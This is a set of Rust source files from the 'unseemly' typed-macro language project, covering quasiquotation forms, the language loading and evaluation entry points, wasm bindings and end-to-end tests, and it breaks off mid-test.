`**[Expr<Int> Expr<Float>]**`. // If you match syntax under a `*`, you'll get something like `::[T >> Expr<T> ]:::`. // // The second is how we use them: // In a syntax quotation, you can write `...[,x, >> some_syntax]...` pub fn dotdotdot(nt: Name) -> Rc<FormPat> { Rc::new(FormPat::Scope(dotdotdot_form(nt), crate::beta::ExportBeta::Nothing)) } // Once it's possible to write `where Mode::Elt = Ast and Mode::Err = <whatever>`, // this can be turned into a function. 
// The behavior of `...[]...` is identical in positive and negative modes. macro_rules! ddd_type__body { ($ddd_parts:expr) => { { let drivers : Vec<Name> = $ddd_parts.get_rep_term(n("driver")).into_iter().map(|a| { match a.c() { QuoteLess(ref d, _) => d.vr_to_name(), _ => icp!() } }).collect(); // HACK: we want to operate on the environment one level less quoted // (that's why we put commas around the drivers) // Not sure what how OEH interacts with this. Doesn't matter in the positive case. let (_, ddd_parts_uq) = $ddd_parts.quote_less(); let mut walked_env = Assoc::new(); let repeats = match ddd_parts_uq.env.find(&drivers[0]) { Some(ast) => { match ast.c() { &Node(ref form, ref parts, _) if form.name == n("tuple") => { parts.get_rep_leaf_or_panic(n("component")).len() } // TODO: what if some are `tuple` and others are `dotdotdot`? &Node(ref form, _, _) if form.name == n("dotdotdot") => 1, _ => { ty_err!(UnableToDestructure(ast.clone(), n("tuple")) at ddd_parts_uq.this_ast); } } } _ => ty_err!(UnboundName(drivers[0]) at ddd_parts_uq.this_ast), }; // We should be invoking `get_res` once per repetition, // and reconstructing a repetition... somehow. for i in 0..repeats { for (name, ty) in ddd_parts_uq.env.iter_pairs() { if drivers.contains(name) { walked_env = walked_env.set(*name, match ty.c() { Node(ref form, ref parts, _) if form.name == n("tuple") => { let component = parts.get_rep_leaf_or_panic(n("component"))[i].clone(); let ddd2_form = crate::core_forms::find("Type", "dotdotdot_type"); if let Some(ddd2_parts) = component.destructure(ddd2_form) { // HACK! If the tuple had a ddd, we should just unwrap it. // We should somehow eliminate this linkage between // syntax repetition and tuples with type repetition. 
ddd2_parts.get_leaf_or_panic(&n("body")).clone() } else { component } } Node(ref form, ref parts, _) if form.name == n("dotdotdot") => { parts.get_leaf_or_panic(&n("body")).clone() } _ => ty_err!(UnableToDestructure(ty.clone(), n("tuple")) at ty), }); } else { walked_env = walked_env.set(*name, ty.clone()); } } } ddd_parts_uq.with_environment(walked_env).quote_more(None).get_res(n("body")) } }; } // TODO #38: This should take a grammar, not an NT, as an argument, // and be located underneath each Plus or Star. pub fn dotdotdot_form(nt: Name) -> Rc<Form> { Rc::new(Form { name: n("dotdotdot"), grammar: Rc::new(form_pat!((delim "...[", "[", [(star [(call "DefaultSeparator"), (scan_cat "(,)", "keyword.operator"), (named "driver", (-- 1 varref)), (call "DefaultSeparator"), (scan_cat "(,)", "keyword.operator")]), (lit ">>"), (named "body", (call_by_name nt))]))), type_compare: Positive(NotWalked), // this is not a type form synth_type: Both( cust_rc_box!(|ddd_parts| { ddd_type__body!(ddd_parts) }), cust_rc_box!(|ddd_parts| { ddd_type__body!(ddd_parts) }), ), // An evaluate-time version of this might be a good idea; // it might be all that's needed to implement variable-number-of-argument functions. // It shouldn't be the same form, though. Maybe `...( >> )...` ? eval: Positive(NotWalked), quasiquote: Positive(cust_rc_box!(|ddd_parts| { use crate::{ runtime::eval::{Sequence, Value}, walk_mode::WalkElt, }; let (_, ddd_parts_uq) = ddd_parts.quote_less(); let drivers: Vec<Name> = ddd_parts_uq .get_rep_term(n("driver")) .into_iter() .map(|a| match a.c() { QuoteLess(ref d, _) => d.vr_to_name(), _ => icp!(), }) .collect(); // TODO: the typechecker should reject dotdotdotds with no drivers, // or where a driver isn't in scope. 
let count = match *ddd_parts_uq.env.find_or_panic(&drivers[0]) { Sequence(ref contents) => contents.len(), ref other => icp!("type error: {} isn't a sequence", other), }; let mut reps: Vec<Ast> = vec![]; for i in 0..count { let mut walked_env = Assoc::new(); for (n, val) in ddd_parts_uq.env.iter_pairs() { let walked_val = if drivers.contains(n) { match *val { Sequence(ref contents) => (*contents[i]).clone(), _ => icp!("type error"), } } else { val.clone() }; walked_env = walked_env.set(*n, walked_val); } ddd_parts_uq.clear_memo(); reps.push( ddd_parts_uq .with_environment(walked_env) .quote_more(None) .get_res(n("body"))? .to_ast(), ); } // HACK: this tells `walk_quasi_literally` to splice (TODO #40?) Ok(Value::from_ast(&raw_ast!(Shape(reps)))) })), }) } // How do we walk quasiquotations? // During type synthesis, we are checking the internal structure of the quoted syntax, // and we walk it just like we walk normal AST; just with a shifted environment. // This is why we sometimes need type annotations. // During evaluation, quoted terms are inactive. // Everything (except `unquote` and `dotdotdot`!) is LiteralLike. // Furthermore, the direction of the walk is determined by the direction of the original quotation. pub fn quote(pos: bool) -> Rc<Form> { use crate::{earley::ParseContext, grammar::FormPat::*}; let perform_quotation = move |pc: ParseContext, starter_info: Ast| -> ParseContext { let starter_nt = match starter_info.c() { IncompleteNode(ref parts) => parts.get_leaf_or_panic(&n("nt")).vr_to_name(), _ => icp!("malformed quotation"), }; fn already_has_unquote(fp: &FormPat) -> bool { match *fp { Alt(ref parts) => parts.iter().any(|sub_fp| already_has_unquote(&*sub_fp)), Biased(ref plan_a, ref plan_b) => { already_has_unquote(&*plan_a) || already_has_unquote(&*plan_b) } Scope(ref f, _) => f.name == n("unquote"), _ => false, } } let pos_inside = nt_is_positive(starter_nt); // TODO: Editing forms is really sketchy! 
// Maybe we should go back to having a special (gensymmed) NT // or some other way to signal to the parser to treat repetitions differently. let new_grammar = pc .grammar .keyed_map_borrow_f(&mut |nt: &Name, nt_def: &Rc<FormPat>| { if already_has_unquote(nt_def) // HACK: this is to avoid hitting "starterer". TODO: find a better way || (nt != &n("Expr") && nt != &n("Pat") && nt != &n("Type") && nt != &n("AtomNotInPat")) { nt_def.clone() } else { let nt_for_type = if nt == &n("AtomNotInPat") { n("Atom") } else { *nt }; // TODO #38: we should insert `dotdotdot` under Star and Plus, // not at the top level Rc::new(Biased( unquote(nt_for_type, pos), Rc::new(Biased(dotdotdot(*nt), nt_def.clone())), )) } }) .set( n("QuotationBody"), Rc::new(form_pat!( // HACK: The `nt` from outside isn't in the same Scope, it seems: [(named "nt", (anyways (vr starter_nt))), (alt [], [(call "DefaultSeparator"), (scan r"(<)"), (named "ty_annot", (call "Type")), (call "DefaultSeparator"), (scan r"(>)")]), (lit "|"), (named "body", (++ pos_inside (call_by_name starter_nt)))])), ); pc.with_grammar(new_grammar) }; // TODO #4: the following hardcodes positive walks as `Expr` and negative walks as `Pat`. // What happens when more NTs are added? Rc::new(Form { name: if pos { n("quote_expr") } else { n("quote_pat") }, grammar: Rc::new(form_pat!((delim "'[", "[", // TODO: use `extend`, not `extend_nt`. Can it resolve the HACK above? [(extend_nt (named "nt", varref), "QuotationBody", perform_quotation)]))), type_compare: Both(NotWalked, NotWalked), // Not a type synth_type: if pos { Positive(cust_rc_box!(|quote_parts| { if nt_is_positive(quote_parts.get_term(n("nt")).vr_to_name()) { // TODO #9: if the user provides an annotation, check it! 
Ok(ast!({"Type" "type_apply" : "type_rator" => (, nt_to_type(quote_parts.get_term(n("nt")).vr_to_name()) ), "arg" => [(, remove_opacity(&quote_parts.get_res(n("body"))?, -1) )] })) } else { if !quote_parts.has(n("ty_annot")) { ty_err!(AnnotationRequired (()) at quote_parts.this_ast); } let expected_type = &quote_parts.get_res(n("ty_annot"))?; // We're looking at things 1 level deeper: let prot_expected_type = adjust_opacity(expected_type, quote_parts.env.clone(), 1); // TODO: do we need this result environment somewhere? // Note that `Pat<Point>` (as opposed to `Pat <:[x: Real, y: Real>:`) // is what we want! // In other words, syntax types don't care about positive vs. negative! // There's a longer argument in the form of code to this effect elsewhere, // but it boils down to this: environments can always be managed directly, // by introducing and referencing bindings. let _ = &quote_parts.with_context(prot_expected_type).get_res(n("body")); Ok(ast!({"Type" "type_apply" : "type_rator" => (, nt_to_type(quote_parts.get_term(n("nt")).vr_to_name()) ), "arg" => [ (,expected_type.clone()) ]})) } })) } else { Negative(cust_rc_box!(|quote_parts| { // There's no need for a type annotation let nt = quote_parts.get_term(n("nt")).vr_to_name(); if nt_is_positive(nt) { // TODO #9: check that this matches the type annotation, if provided! quote_parts.get_res(n("body")) } else { let new_context = less_quoted_ty(quote_parts.context_elt(), Some(nt), &quote_parts.this_ast)?; // TODO #9: check that this matches the type annotation, if provided! 
quote_parts.with_context(new_context).get_res(n("body")) } })) }, eval: if pos { Positive(cust_rc_box!(|quote_parts| { let mq_parts = quote_parts.switch_mode::<QQuote>().quote_more(None); match mq_parts.get_term_ref(n("body")).c() { // Strip the `QuoteMore`: QuoteMore(a, _) => crate::ast_walk::walk::<QQuote>(&*a, &mq_parts), _ => icp!(), } })) } else { Negative(cust_rc_box!(|quote_parts| { let context = quote_parts.context_elt().clone(); let mq_parts = quote_parts.switch_mode::<QQuoteDestr>().quote_more(None).with_context(context); match mq_parts.get_term_ref(n("body")).c() { // Strip the `QuoteMore`: QuoteMore(body, _) => crate::ast_walk::walk::<QQuoteDestr>(&*body, &mq_parts), _ => icp!(), } })) }, quasiquote: Both(LiteralLike, LiteralLike), }) } #[test] fn quote_unquote_eval_basic() { use crate::{ast_walk::LazyWalkReses, runtime::eval::Value}; let pos = true; let neg = false; let env = assoc_n!( "n" => val!(i 5), "en" => val!(ast (vr "qn")) ); let qenv = assoc_n!( "qn" => val!(i 6) ); fn eval_two_phased( expr: &Ast, env: Assoc<Name, Value>, qenv: Assoc<Name, Value>, ) -> Result<Value, ()> { crate::ast_walk::walk::<Eval>(expr, &LazyWalkReses::new_mq_wrapper(env, vec![qenv])) } fn destr_two_phased( pat: &Ast, env: Assoc<Name, Value>, qenv: Assoc<Name, Value>, ctxt: Value, ) -> Result<Assoc<Name, Value>, ()> { crate::ast_walk::walk::<Destructure>( pat, &LazyWalkReses::new_mq_wrapper(env, vec![qenv]).with_context(ctxt), ) } assert_eq!( eval_two_phased( &ast!({quote(pos) ; "nt" => (vr "Expr"), "body" => (++ true (vr "qn"))}), env.clone(), qenv.clone() ), Ok(val!(ast (vr "qn"))) ); assert_eq!( eval_two_phased( &ast!({quote(pos) ; "nt" => (vr "Expr"), "body" => (++ true {unquote_form(n("Expr"), true, 1) ; "nt" => (vr "Expr"), "body" => (-- 1 (vr "en"))})}), env.clone(), qenv.clone() ), Ok(val!(ast (vr "qn"))) ); assert_eq!( destr_two_phased( &ast!({quote(neg) ; "nt" => (vr "Expr"), "body" => (++ false (vr "qn"))}), env.clone(), qenv.clone(), val!(ast (vr "qn")) ), 
Ok(Assoc::<Name, Value>::new()) ); // '[Expr | match qn { x => qn }]' assert_m!( eval_two_phased( &ast!({quote(pos) ; "nt" => (vr "Expr"), "body" => (++ true {"Expr" "match" : "scrutinee" => (vr "qn"), "p" => [@"c" "x"], "arm" => [@"c" (import ["p" = "scrutinee"] (vr "qn"))]})}), env.clone(), qenv.clone() ), Ok(_) ); } #[test] fn quote_type_basic() { let pos = true; let neg = false; let env = assoc_n!( "n" => ast!({"Type" "Nat" :}) ); let qenv = assoc_n!( "qn" => ast!({"Type" "Nat" :}) ); let expr_type = crate::core_type_forms::get__primitive_type(n("Expr")); let pat_type = crate::core_type_forms::get__primitive_type(n("Pat")); fn synth_type_two_phased( expr: &Ast, env: Assoc<Name, Ast>, qenv: Assoc<Name, Ast>, ) -> crate::ty::TypeResult { crate::ast_walk::walk::<crate::ty::SynthTy>( expr, &crate::ast_walk::LazyWalkReses::new_mq_wrapper(env, vec![qenv]), ) } // '[Expr | qn]' assert_eq!( synth_type_two_phased( &ast!({quote(pos) ; "nt" => (vr "Expr"), "body" => (++ true (vr "qn"))}), env.clone(), qenv.clone() ), Ok(ast!({"Type" "type_apply" : "type_rator" => (,expr_type.clone()), "arg" => [{"Type" "Nat" :}]})) ); // '[Expr | match qn { x => qn }]' assert_eq!( synth_type_two_phased( &ast!({quote(pos) ; "nt" => (vr "Expr"), "body" => (++ true {"Expr" "match" : "scrutinee" => (vr "qn"), "p" => [@"c" "x"], "arm" => [@"c" (import ["p" = "scrutinee"] (vr "qn"))]})}), env.clone(), qenv.clone() ), Ok(ast!({"Type" "type_apply" : "type_rator" => (,expr_type.clone()), "arg" => [{"Type" "Nat" :}]})) ); // previously unaccessed environments default to the core values/types // '[Expr | '[Expr | five]']' assert_eq!( crate::ty::synth_type( // By default, `synth_type` uses the same env in all phases. &ast!( {quote(pos) ; "nt" => (vr "Expr"), "body" => (++ true {quote(pos) ; "nt" => (vr "Expr"), "body" => (++ true (vr "five"))})}), assoc_n!("five" => uty!({Int :})) ), Ok(ast!({"Type" "type_apply" : "type_rator" => (,expr_type.clone()), "arg" => [{"Type" "type_apply" :
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
true
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/main.rs
src/main.rs
// Unseemly is a "core" typed language with (typed!) macros. // You shouldn't write code in Unseemly. // Instead, you should implement your programming language as Unseemly macros. #![allow(dead_code, unused_macros, non_snake_case, non_upper_case_globals, deprecated)] // dead_code and unused_macros are hopefully temporary allowances // non_snake_case is stylistic, so we can write `non__snake_case`. // non_upper_case_globals is stylistic ... but maybe thread_locals really ought to be upper case. // deprecated is temporary, until `Sky` replaces `EnvMBE` (and the deprecated calls are cleaned up) #![recursion_limit = "128"] // Yikes. // for testing; requires `cargo +nightly` // #![feature(log_syntax, trace_macros)] // trace_macros!(true); // TODO: turn these into `use` statements in the appropriate places #[macro_use] extern crate custom_derive; pub mod macros; pub mod name; // should maybe be moved to `util`; `mbe` needs it pub mod util; pub mod alpha; pub mod ast; pub mod beta; pub mod read; pub mod earley; pub mod grammar; pub mod unparse; pub mod form; pub mod ast_walk; pub mod expand; pub mod subtype; pub mod ty; pub mod ty_compare; pub mod walk_mode; pub mod runtime; pub mod core_extra_forms; pub mod core_forms; pub mod core_macro_forms; pub mod core_qq_forms; pub mod core_type_forms; pub mod highlighter_generation; mod end_to_end__tests; use crate::{ ast::Ast, name::Name, runtime::eval::{eval, Value}, util::assoc::Assoc, }; use wasm_bindgen::prelude::*; /// Everything you need to turn text into behavior. #[derive(Clone)] pub struct Language { pub pc: crate::earley::ParseContext, // TODO: how do these differ from the corresponding elements of `ParseContext`? // Should we get rid of `Language` in favor of it??? pub type_env: Assoc<Name, Ast>, pub type_env__phaseless: Assoc<Name, Ast>, pub value_env: Assoc<Name, Value>, } /// Generate Unseemly. /// (This is the core language.) 
pub fn unseemly() -> Language { Language { pc: crate::core_forms::outermost__parse_context(), type_env: crate::runtime::core_values::core_types(), type_env__phaseless: crate::runtime::core_values::core_types(), value_env: crate::runtime::core_values::core_values(), } } /// Run the file (which hopefully evaluates to `capture_language`), and get the language it defines. /// Returns the parse context, the type environment, the phaseless version of the type environment, /// and the value environment. /// This doesn't take a language 4-tuple -- it assumes that the language is in Unseemly /// (but of course it may do `include /[some_language.unseemly]/` itself). /// TODO: we only need the phaselessness for macros, and maybe we can get rid of it there? pub fn language_from_file(path: &std::path::Path) -> Language { let mut raw_lib = String::new(); use std::io::Read; let orig_dir = std::env::current_dir().unwrap(); std::fs::File::open(path) .expect("Error opening file") .read_to_string(&mut raw_lib) .expect("Error reading file"); // Evaluate the file in its own directory: if let Some(dir) = path.parent() { // Might be empty: if dir.is_dir() { std::env::set_current_dir(dir).unwrap(); } } let lang = get_language(&raw_lib, unseemly()); // Go back to the original directory: std::env::set_current_dir(orig_dir).unwrap(); return lang; } pub fn get_language(program: &str, lang: Language) -> Language { // TODO: I guess syntax extensions ought to return `Result`, too... 
let lib_ast = crate::grammar::parse(&core_forms::outermost_form(), lang.pc, &program).unwrap(); let lib_typed = ast_walk::walk::<ty::SynthTy>( &lib_ast, &ast_walk::LazyWalkReses::new(lang.type_env, lang.type_env__phaseless, lib_ast.clone()), ) .unwrap(); let lib_expanded = crate::expand::expand(&lib_ast).unwrap(); let lib_evaled = crate::runtime::eval::eval(&lib_expanded, lang.value_env).unwrap(); let (new_pc, new__value_env) = if let Value::Sequence(mut lang_and_env) = lib_evaled { let env_value = lang_and_env.pop().unwrap(); let lang_value = lang_and_env.pop().unwrap(); let new_pc = match &*lang_value { Value::ParseContext(boxed_pc) => (**boxed_pc).clone(), _ => icp!("[type error] not a language"), }; let new__value_env = if let Value::Struct(ref env) = *env_value { let mut new__value_env = Assoc::new(); // We need to un-freshen the names that we're importing // so they can actually be referred to. for (k, v) in env.iter_pairs() { new__value_env = new__value_env.set(k.unhygienic_orig(), v.clone()) } new__value_env } else { icp!("[type error] Unexpected lib syntax structure: {:#?}", env_value) }; (new_pc, new__value_env) } else { icp!("[type error] Unexpected lib syntax strucutre: {:#?}", lib_evaled); }; node_let!(lib_typed => {Type tuple} lang_and_types *= component); node_let!(lang_and_types[1] => {Type struct} keys *= component_name, values *= component); let mut new__type_env = Assoc::<Name, Ast>::new(); for (k, v) in keys.into_iter().zip(values.into_iter()) { // As above, unfreshen: new__type_env = new__type_env.set(k.to_name().unhygienic_orig(), v.clone()); } // Do it again, to unpack the phaseless type environment: node_let!(lang_and_types[2] => {Type struct} pl_keys *= component_name, pl_values *= component); let mut new___type_env__phaseless = Assoc::<Name, Ast>::new(); for (k, v) in pl_keys.into_iter().zip(pl_values.into_iter()) { // As above, unfreshen: new___type_env__phaseless = new___type_env__phaseless.set(k.to_name().unhygienic_orig(), v.clone()); 
} Language { pc: new_pc, type_env: new__type_env, type_env__phaseless: new___type_env__phaseless, value_env: new__value_env, } } /// Evaluate a program written in some language. pub fn eval_program(program: &str, lang: Language) -> Result<Value, String> { // TODO: looks like `outermost_form` ought to be a property of `ParseContext` let ast: Ast = crate::grammar::parse(&core_forms::outermost_form(), lang.pc, program) .map_err(|e| e.msg)?; let _type = ast_walk::walk::<ty::SynthTy>( &ast, &ast_walk::LazyWalkReses::new(lang.type_env, lang.type_env__phaseless, ast.clone()), ) .map_err(|e| format!("{}", e))?; let core_ast = crate::expand::expand(&ast).map_err(|_| "???".to_string())?; eval(&core_ast, lang.value_env).map_err(|_| "???".to_string()) } /// Evaluate a program written in Unseemly. /// Of course, it may immediately do `include /[something]/` to switch languages. pub fn eval_unseemly_program_top(program: &str) -> Result<Value, String> { eval_program(program, unseemly()) } /// Type program written in Unseemly. /// Of course, it may immediately do `include /[something]/` to switch languages. pub fn type_unseemly_program_top(program: &str) -> Result<Ast, String> { let unseemly = unseemly(); let ast: Ast = crate::grammar::parse(&core_forms::outermost_form(), unseemly.pc, program) .map_err(|e| e.msg)?; ast_walk::walk::<ty::SynthTy>( &ast, &ast_walk::LazyWalkReses::new(unseemly.type_env, unseemly.type_env__phaseless, ast.clone()), ) .map_err(|e| format!("{}", e)) } /// Displays `res` on a color terminal. pub fn terminal_display(res: Result<Value, String>) { match res { Ok(v) => println!("\x1b[1;32m≉\x1b[0m {}", v), Err(s) => println!("\x1b[1;31m✘\x1b[0m {}", s), } } fn html_render(res: Result<Value, String>) -> String { match res { Ok(v) => format!("<b>{}</b>", v), // HACK: codespan_reporting uses terminal escapes Err(s) => format!("<pre>{}</pre>", ansi_to_html::convert_escaped(&s).unwrap()), } } use std::iter::FromIterator; thread_local! 
{ static language_stash: std::cell::RefCell<std::collections::HashMap<String, Language>> = std::cell::RefCell::new(std::collections::HashMap::from_iter( vec![("unseemly".to_string(), unseemly())].into_iter())); } #[wasm_bindgen] pub fn html__eval_program(program: &str, stashed_lang: &str) -> String { let lang: Language = language_stash.with(|ls| (*ls.borrow()).get(stashed_lang).unwrap().clone()); html_render(eval_program(program, lang)) } /// Evaluate `program` in `lang_of_program`, and stash the resulting language in `result_name`. /// "unseemly" starts out in the stash, so it's possible to start from somewhere. #[wasm_bindgen] pub fn stash_lang(result_name: &str, program: &str, lang_of_progam: &str) { let orig_lang = language_stash.with(|ls| (*ls.borrow()).get(lang_of_progam).unwrap().clone()); let new_lang = get_language(program, orig_lang); language_stash.with(|ls| ls.borrow_mut().insert(result_name.to_string(), new_lang)); } #[wasm_bindgen] pub fn generate__ace_rules(stashed_lang: &str) -> String { let rules = language_stash.with(|ls| { highlighter_generation::ace_rules(&(*ls.borrow()).get(stashed_lang).unwrap().pc.grammar) }); format!( "start: [ {} // HACK: comments aren't part of the base language: {{ token: 'comment', regex: '#[^\\\\n|][^\\\\n]*|#\\\\|.*?\\\\|#' }}]", rules ) } #[wasm_bindgen] pub fn generate__ace_rules__for(program: &str, stashed_lang: &str) -> String { let lang = language_stash .with(|ls| (*ls.borrow()).get(stashed_lang).expect("Language not defined").clone()); highlighter_generation::dynamic__ace_rules(program, &lang) }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/end_to_end__tests.rs
src/end_to_end__tests.rs
use crate::{ ast::Ast, core_forms, eval_unseemly_program_top, expand, grammar, name::{n, Name}, runtime::{core_values, eval, eval::Value}, ty, type_unseemly_program_top, util::assoc::Assoc, }; use std::cell::RefCell; // HACK: the non-test code in here is copied from `cli.rs`. thread_local! { pub static ty_env : RefCell<Assoc<Name, Ast>> = RefCell::new(core_values::core_types()); pub static val_env : RefCell<Assoc<Name, Value>> = RefCell::new(core_values::core_values()); } fn type_unseemly_program(program: &str) -> Result<Ast, String> { let ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), program, ) .map_err(|e| e.msg)?; ty_env.with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e))) } fn eval_unseemly_program(program: &str) -> Result<Value, String> { let ast: Ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), program, ) .map_err(|e| e.msg)?; let _type = ty_env .with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e)))?; let core_ast = expand::expand(&ast).map_err(|_| "error".to_owned())?; val_env.with(|vals| eval::eval(&core_ast, vals.borrow().clone()).map_err(|_| "???".to_string())) } fn assign_variable(name: &str, expr: &str) -> Result<Value, String> { let res = eval_unseemly_program(expr); if let Ok(ref v) = res { let ty = type_unseemly_program(expr).unwrap(); ty_env.with(|tys| { val_env.with(|vals| { let new_tys = tys.borrow().set(n(name), ty); let new_vals = vals.borrow().set(n(name), v.clone()); *tys.borrow_mut() = new_tys; *vals.borrow_mut() = new_vals; }) }) } res } fn assign_t_var(name: &str, t: &str) -> Result<Ast, String> { let ast = grammar::parse( &grammar::FormPat::Call(n("Type")), core_forms::outermost__parse_context(), t, ) .map_err(|e| e.msg)?; let res = ty_env.with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e))); if let Ok(ref t) = res { ty_env.with(|tys| { let new_tys = 
tys.borrow().set(n(name), t.clone()); *tys.borrow_mut() = new_tys; }) } res } fn ignore__this_function() { // Suppress unused variable warnings for functions only used in tests. let _ = eval_unseemly_program_top; let _ = type_unseemly_program_top; } // Many of these tests should be converted to `u!`-based tests. // In a lot of cases, the fact htat `u!` doesn't support syntax quotation is an obstacle. // TODO: cut the knot and bake syntax {,un}quotation support to `u!`. #[test] fn end_to_end_int_list_tools() { assert_m!(assign_t_var("IntList", "mu_type IntList . { +[Nil]+ +[Cons Int IntList]+ }"), Ok(_)); assert_m!(assign_t_var("IntListUF", "{ +[Nil]+ +[Cons Int IntList]+ }"), Ok(_)); assert_m!( assign_variable("mt_ilist", "fold +[Nil]+ : { +[Nil]+ +[Cons Int IntList]+ } : IntList"), Ok(_) ); assert_m!( assign_variable("ilist_3", "fold +[Cons three mt_ilist]+ : IntListUF : IntList"), Ok(_) ); assert_m!( assign_variable("ilist_23", "fold +[Cons two ilist_3]+ : IntListUF : IntList"), Ok(_) ); assert_m!( assign_variable("ilist_123", "fold +[Cons one ilist_23]+ : IntListUF : IntList"), Ok(_) ); assert_m!( assign_variable( "sum_int_list", "(fix .[again : [-> [IntList -> Int]] . .[ lst : IntList . match unfold lst { +[Nil]+ => zero +[Cons hd tl]+ => (plus hd ((again) tl))} ]. ]. )" ), Ok(_) ); assert_eq!(eval_unseemly_program("(sum_int_list ilist_123)"), Ok(val!(i 6))); assert_m!( assign_variable( "int_list_len", "(fix .[again : [-> [IntList -> Int]] . .[ lst : IntList . match unfold lst { +[Nil]+ => zero +[Cons hd tl]+ => (plus one ((again) tl))} ]. ].)" ), Ok(_) ); assert_eq!(eval_unseemly_program("(int_list_len ilist_123)"), Ok(val!(i 3))); } #[test] fn end_to_end_list_tools() { assert_m!( assign_t_var("List", "forall T . mu_type List . { +[Nil]+ +[Cons T List<T> ]+ }"), Ok(_) ); assert_m!(assign_t_var("ListUF", "forall T . 
{ +[Nil]+ +[Cons T List<T> ]+ }"), Ok(_)); assert_m!( assign_variable( "mt_list", "fold +[Nil]+ : { +[Nil]+ +[Cons Int List<Int> ]+ } : List < Int > " ), Ok(_) ); assert_m!( assign_variable("list_3", "fold +[Cons three mt_list]+ : ListUF<Int> : List<Int>"), Ok(_) ); assert_m!( assign_variable("list_23", "fold +[Cons two list_3]+ : ListUF<Int> : List<Int>"), Ok(_) ); assert_m!( assign_variable("list_123", "fold +[Cons one list_23]+ : ListUF<Int> : List<Int>"), Ok(_) ); assert_m!( assign_variable( "list_len", "forall S . (fix .[again : [-> [List<S> -> Int]] . .[ lst : List<S> . match unfold lst { +[Nil]+ => zero +[Cons hd tl]+ => (plus one ((again) tl))} ]. ].)" ), Ok(_) ); assert_eq!(eval_unseemly_program("(list_len list_123)"), Ok(val!(i 3))); assert_m!( assign_variable( "map", "forall T S . (fix .[again : [-> [List<T> [T -> S] -> List<S> ]] . .[ lst : List<T> f : [T -> S] . match unfold lst { +[Nil]+ => fold +[Nil]+ : ListUF<S> : List<S> +[Cons hd tl]+ => fold +[Cons (f hd) ((again) tl f)]+ : ListUF<S> : List<S> } ]. ].)" ), Ok(_) ); // TODO: what should even happen if you have `forall` not on the "outside"? // It should probably be an error to have a value typed with an underdetermined type. // TODO: it's way too much of a pain to define each different expected result list. assert_m!(eval_unseemly_program("(map list_123 .[x : Int . (plus x one)]. )"), Ok(_)); assert_m!(eval_unseemly_program("(map list_123 .[x : Int . (equal? x two)]. )"), Ok(_)); } #[test] fn subtyping_direction() { // Let's check to make sure that "supertype" and "subtype" never got mixed up: assert_m!(assign_variable("ident", "forall T . .[ a : T . a ]."), Ok(_)); assert_eq!(eval_unseemly_program("(ident five)"), Ok(val!(i 5))); assert_m!(eval_unseemly_program("( .[ a : [Int -> Int] . a]. ident)"), Ok(_)); assert_m!(eval_unseemly_program("( .[ a : forall T . [T -> T] . a]. .[a : Int . a].)"), Err(_)); assert_m!(eval_unseemly_program(".[ a : *[]* . 
a]."), Ok(_)); assert_m!( eval_unseemly_program("( .[ a : *[normal : Int extra : Int]* . a]. *[normal : one]*)"), Err(_) ); assert_m!( eval_unseemly_program("( .[ a : *[normal : Int]* . a]. *[normal : one extra : five]*)"), Ok(_) ); } #[test] fn end_to_end_quotation_advanced() { assert_eq!( eval_unseemly_program( "(.[five_e : Expr < Int >. '[Expr | (plus five ,[five_e],) ]' ]. '[Expr | five]')" ), eval_unseemly_program("'[Expr | (plus five five) ]'") ); // Pass the wrong type (not really a test of quotation) assert_m!( type_unseemly_program_top( "(.[five_e : Expr<Int> . '[Expr | (plus five ,[five_e],) ]' ]. '[Expr | true]')" ), Err(_) ); // Interpolate the wrong type assert_m!( type_unseemly_program_top( "(.[five_e : Expr<Bool> . '[Expr | (plus five ,[five_e],) ]' ]. '[Expr | true]')" ), Err(_) ); // Interpolate the wrong type (no application needed to find the error) assert_m!( type_unseemly_program_top(".[five_e : Expr<Bool> . '[Expr | (plus five ,[five_e],) ]' ]."), Err(_) ); assert_m!( eval_unseemly_program( "forall T . .[type : Type<T> rhs : Expr<T> . '[Expr | (.[x : ,[Type<T> | type], . eight]. ,[rhs], )]' ]." ), Ok(_) ); assert_m!(eval_unseemly_program("'[Pat<Nat> | x]'"), Ok(_)); // Actually import a pattern of quoted syntax: assert_eq!( eval_unseemly_program( "match '[Expr | (plus one two) ]' { '[Expr<Int> | (plus ,[Expr<Int> | e], two) ]' => e }" ), eval_unseemly_program("'[Expr| one]'") ); // Thanks to `prefab_type`, we can do implicitly-typed `let` // expanding to explicitly-typed lambda! // See `trad_let.unseemly` for details. assert_m!( assign_variable( "let", "forall T S . .[binder : Pat<T> type : Type<T> rhs : Expr<T> body : Expr<S> . '[ Expr | (.[x : ,[type], . match x { ,[Pat<T> | binder], => ,[body], } ]. ,[rhs],)]' ]." ), Ok(_) ); without_freshening! { assert_eq!( eval_unseemly_program( "(let '[Pat<Int> | y]' '[Type<Int> | Int]' '[Expr<Int> | eight]' '[Expr<Int> | five]')"), eval_unseemly_program("'[Expr<Int> | (.[x : Int . match x {y => five}]. 
